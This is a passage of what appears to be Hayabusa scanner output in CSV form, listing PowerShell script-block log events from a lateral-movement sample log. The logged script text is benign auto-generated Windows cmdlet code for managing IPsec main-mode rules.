[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"im:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeRule' -Alias '*' function Get-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRec",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 